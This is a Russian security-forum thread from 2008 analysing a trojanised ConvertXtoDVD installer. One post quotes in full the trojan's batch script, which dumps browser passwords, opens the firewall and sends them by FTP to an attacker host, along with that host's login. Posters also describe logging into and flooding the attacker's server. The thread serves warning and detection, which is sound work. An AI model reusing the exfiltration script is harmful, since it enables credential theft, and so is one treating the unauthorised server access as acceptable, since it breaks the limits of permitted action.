Показано с 1 по 8 из 8.

комплект троянов маскирующихся под vsoConvertXtoDVD3.1.3.36.ехе (beta)

  1. #1
    Junior Member Репутация
    Регистрация
    17.05.2008
    Сообщений
    20
    Вес репутации
    40

    комплект троянов маскирующихся под vsoConvertXtoDVD3.1.3.36.ехе (beta)

    На данный момент о нём известно - имя файла контейнера - фиксированное,
    имя архива - может меняться, но вариации не значительны, контрольные
    суммы - MD5 и SHA-1, размер, время и дата модификации (штамп времени),
    внутренний формат. Берите, что у нас есть и проверяйте на совпадение
    данных признаков:

    Код:
    MD5SUM : b50c6d9bccf5026afa93375f1479b485 *vsoConvertXtoDVD3.1.3.36.exe

    SHA-1 : 5f08afbf3c2b8b015b4c8793958076061e607b98 *vsoConvertXtoDVD3.1.3.36.exe

    Size: 16652800 byte

    Name: vsoConvertXtoDVD3.1.3.36.exe

    Время/дата : 02.07.08 23:42

    Данный комплект распространяется похоже с Запада - это статистика которую вытащил мой товарищ из списков паролей на сервере. По его словам западные адреса там составляли 90% - 95% адресов машин-отправителей.

    Вот, что есть у меня:

    Картинка scr1.png - это вид контейнера. Открыт как архив в Far Manager, Scr2.jpg (JPEG портит изображение) - внутрення структура переименованного оригинального инсталлятора открытого в Far как архив, scr3.jpg - то же, но вирусного пакета.

    Вот один из первых моих опытов:

    2.exe - набор из троянов и руткитов. От меня они ломились куда-то, да фокус не вышел - я эту дрянь запустил на ноуте где винт стоит всего на 5 Гб и сети нету как явления из под BSD + WINE. Понаблюдал сию "мышиную возню", и закрыл лавочку сняв питание. Пара руткитов там сидит, это точно. Формат одного ELF, "заточен" под ядро 2.6.х.х LINUX. Что не удивительно - как платформа LINUX достаточно популярна, и этого кое-кому достаточно.

    Эксперимент проводился на старом RoverBook FT5 (C3-800/128 Mb RAM/SiS 315/5 Gb HDD) под FreeBSD 6.3 + WINE 1.0 специально для этого установленными на данную машину.

    Вот мой ответ на вопрос одного из пользователей:

    В.
    "я немного протупил, не прочитал посты что дальше идут и скачал то, что выложили вышеуказанные "товарищи". Но не успел запустить файлы из архива. Как думаешь, трояны ничего не сделали если я их не запускал?"

    О.
    Если не запускал "инсталлятор", то ничего страшного. С "подарком" можно справится легко: открой в Winrar архив, переименуй установщик в *.cab (в принципе можно и не делать, да так спокойнее) и спокойно вытаскивай оттуда 1.ехе. Потом переименуй его так, как был назван инсталлятор. А *.cab удали из архива. По крайней мере у Nuclears он не блокирован, архивы с 2baksa обычно блокированы. Всё. Зараза обезврежена.

    Информация моих товарищей:

    "В "инсталляции" 3.1.2.36 - троян. Сама инсталляция представляет собой sfx-архив (WinRar'ом распаковывается). Внутри лончер, оригинальная инсталляция ConvertXtoDVD (1.exe) и "зоопарк" в файле 2.exe. При запуске в темп распаковывается несколько программ из 2.exe и запускаются по очереди. Достаёт пароли с IE и Firefox'а (складывает в темп в простых текстовых файлах), потом эти файлы заливает по ftp (с логином и паролем), предварительно разрешив в фаерволе доступ по FTP без запроса. Нигде себя не прописывает.
    Зашёл на тот FTP - там уже тысячи файлов с паролями жертв. Удалил сколько смог."

    "Вообще данная версия была выложена на форуме VSO (бета, с исправленными ошибками предыдущего релиза), на оффсайте не выкладывалась. Но на форуме она была чистая - обыкновенная инсталляция, без троянов. Заразу добавили потом, "релиз" с трояном засветился сначала на западе, разошёлся по западным варезникам, а потом уже попал к нам. Так что никто, в общем-то, не виноват.
    Судя по географии заражённых машин (статистика с FTP с паролями), 90-95% заражений - запад.
    Очень забавно было видеть в файлах с паролями последней строкой адрес какого-нибудь варезника с темой про VSO ConvertXtoDVD. Но меня терзают смутные сомнения, что он используется не только с сабжевой программой.
    Насчёт последней официальной версии на сайте VSO - Касперский ругается при попытке её скачивания, но это ошибочное срабатывание, версия чиста.
    Официальный представитель VSO отписался по этому поводу на форуме Касперски Лаб в теме по данному трояну.
    Вообще троян сделан просто, но довольно прилежно - ни вся сборка в целом, ни каждая отдельная утилита, содержащаяся в нём, ничем не определялись на вирустотале. Единственная ошибка - троянописатели поленились настроить FTP так, чтобы туда можно было заливать файлы, но нельзя было увидеть список уже лежащих там файлов. Тогда вся схема была бы почти идеальна."
    Изображения Изображения
    • Тип файла: png scr1.png (8.1 Кб, 25 просмотров)
    • Тип файла: jpg scr2.jpg (34.1 Кб, 14 просмотров)
    • Тип файла: jpg scr3.jpg (24.4 Кб, 12 просмотров)

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Junior Member Репутация
    Регистрация
    17.05.2008
    Сообщений
    20
    Вес репутации
    40

    Дополнение по данному зловреду с 9Down

    Вот, обнаружил случайно на 9down в посте sleeptalker информацию, которая думаю окажется полезной:

    TROJAN!!!!!

    Check yourself. Run the setup. Look in your temp folder for 2.exe and runtime.exe and more. It tries to steal your saved passwords in Firefox and IE.

    Setup filesize with trojan 16 652 800 bytes
    Setup filesize without trojan 15 528 800 bytes

    Here a script that the trojan runs:
    @echo off
    set restmpdir=C:\Users\\AppData\Local\Temp\bdtmp\
    set bfcec=C:\Users\\AppData\Local\Temp\bdtmp\tmp7970.e xe
    REM HideSelf
    %TEMP%\dependencies.exe >> %TEMP%\%COMPUTERNAME%ff.txt
    %TEMP%\runtime.exe /stext %TEMP%\%COMPUTERNAME%ie7.txt
    netsh firewall add allowedprogram %SYSTEMROOT%\system32\ftp.exe "File Transfer Protocol" ENABLE
    @echo off
    set bat=%TEMP%\ftp.dat
    echo phynxz>> %bat%
    echo cyberraid>> %bat%
    echo ascii>> %bat%
    echo put %TEMP%\%COMPUTERNAME%ff.txt>> %bat%
    echo put %TEMP%\%COMPUTERNAME%ie7.txt>> %bat%
    echo quit>> %bat%

    ftp -s:%TEMP%\ftp.dat phynxz.vndv.com


    I've looked at it more closely. It uses a batch script and two common tools for finding passwords. One of them is this http://www.nirsoft.net/utils/interne..._password.html. I haven't identified the other yet. I discovered it with Kaspersky Internet Security. Not because it identified it as a virus or trojan. It did not. But KIS 2009 asked if it should allow 2.exe to run. I found it strange as the setup was already finished.

    I've seen this file spread all over the internet. I've warned some of the sites about it.

    I found the login to the hackers ftp that his trojan uses. Here it is.
    ip: phynxz.vndv.com
    username: phynxz
    password: cyberraid
    Я только что удалил с данного сайта 178 файлов с паролями и заливаю туда дополнительно ещё 78 Мб мусора - переименованные распакованные драйвера от звуковой платы Audigy 2. Не забью квоту этим - найду другой мусор. Но, факт, что данный сайт работает....

    Добавлено через 55 минут

    Registrant:
    Jack Cator

    Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
    Domain Name: VNDV.COM

    Domain servers in listed order:
    ns1.vndv.com
    ns2.vndv.com

    Добавлено через 1 минуту

    На данный момент на сервер залито в общей сложности порядка 180 Мб мусора в виде переименованных драйверов и художественной литературу что под руку попалась.
    Последний раз редактировалось VictorVG; 08.07.2008 в 06:12. Причина: Добавлено

  4. #3
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для AndreyKa
    Регистрация
    08.01.2005
    Адрес
    Россия
    Сообщений
    13,630
    Вес репутации
    1296
    Загрузите файл 2.exe в zip архиве с паролем virus по ссылке:
    http://virusinfo.info/upload_virus.php?tid=26052

  5. #4
    Junior Member Репутация
    Регистрация
    17.05.2008
    Сообщений
    20
    Вес репутации
    40
    Готово. Файл закачан. Отчёт формы:
    Файл сохранён как 080708_015329_virus_48730ee98a183.zip
    Размер файла 1071951
    MD5 edfcc9b187f978f2789514e2efddb3c7

    Могу прислать и образцы паролей скачиваемых данными троянами..

  6. #5
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для AndreyKa
    Регистрация
    08.01.2005
    Адрес
    Россия
    Сообщений
    13,630
    Вес репутации
    1296
    Антивирус Касперского уже детектировал его как Trojan-PSW.Win32.IEPass.a
    В лаборатории DrWeb его добавили в базы как Trojan.PWS.Firefox.1

  7. #6
    Junior Member Репутация
    Регистрация
    17.05.2008
    Сообщений
    20
    Вес репутации
    40
    AndreyKa

    Большое спасибо! Теперь остаётся только дождаться реакции хостера и закрытия сайта владельца трояна.

  8. #7
    Junior Member Репутация
    Регистрация
    17.05.2008
    Сообщений
    20
    Вес репутации
    40
    На данный момент удаление списков краденных паролей с данного сайта не возможно - владелец установил аттрибуты доступа rw-r--r--

    Добавлено через 4 часа 1 минуту

    Проверил данный сервер. Пароль сменили. Значит ждём новую версию трояна. Вот лог FTP:

    03:07:46 Статус: Определение IP для phynxz.vndv.com
    03:07:46 Статус: Соединяюсь с 207.210.86.252:21...
    03:07:46 Статус: Соединение установлено, ожидание приглашения...
    03:07:47 Ответ: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    03:07:47 Ответ: 220-You are user number 50 of 250 allowed.
    03:07:47 Ответ: 220-Local time is now 14:09. Server port: 21.
    03:07:47 Ответ: 220-This is a private system - No anonymous login
    03:07:47 Ответ: 220-IPv6 connections are also welcome on this server.
    03:07:47 Ответ: 220 You will be disconnected after 2 minutes of inactivity.
    03:07:47 Команда: USER phynxz
    03:07:47 Ответ: 331 User phynxz OK. Password required
    03:07:47 Команда: PASS *********
    03:07:47 Ответ: 530 Login authentication failed
    03:07:47 Ошибка: Не могу соединиться!
    03:08:11 Статус: Определение IP для phynxz.vndv.com
    03:08:11 Статус: Соединяюсь с 207.210.86.252:21...
    03:08:11 Статус: Соединение установлено, ожидание приглашения...
    03:08:13 Ответ: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    03:08:13 Ответ: 220-You are user number 54 of 250 allowed.
    03:08:13 Ответ: 220-Local time is now 14:09. Server port: 21.
    03:08:13 Ответ: 220-This is a private system - No anonymous login
    03:08:13 Ответ: 220-IPv6 connections are also welcome on this server.
    03:08:13 Ответ: 220 You will be disconnected after 2 minutes of inactivity.
    03:08:13 Команда: USER phynxz
    03:08:13 Ответ: 331 User phynxz OK. Password required
    03:08:13 Команда: PASS *********
    03:08:13 Ответ: 530 Login authentication failed
    03:08:13 Ошибка: Не могу соединиться!
    Последний раз редактировалось VictorVG; 10.07.2008 в 02:10. Причина: Добавлено

  9. #8
    Junior Member Репутация
    Регистрация
    17.05.2008
    Сообщений
    20
    Вес репутации
    40
    Сегодня, 11 Июля 2008 года я получил сообщение о добавлении этого вируса в базы ClamAV под именем Trojan.PSW.IEPass

    Dear ClamAV user,

    The following submissions have been processed and published:
    - 3863177 Trojan.PSW.IEPass
    - 3879008 Trojan.PSW.IEPass

    See http://cvdpedia.clamav.net/daily/7693

Похожие темы

  1. Ответов: 1
    Последнее сообщение: 18.08.2010, 23:49
  2. Ответов: 1
    Последнее сообщение: 18.08.2009, 16:02
  3. «Доктор Веб» и Acronis представили совместный комплект решений
    От SDA в разделе Новости компьютерной безопасности
    Ответов: 2
    Последнее сообщение: 20.01.2009, 23:48
  4. IE8 Beta 1 vs. Firefox 3 Beta 4: кто быстрее?
    От SDA в разделе Софт - общий
    Ответов: 1
    Последнее сообщение: 01.04.2008, 14:34

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01557 seconds with 19 queries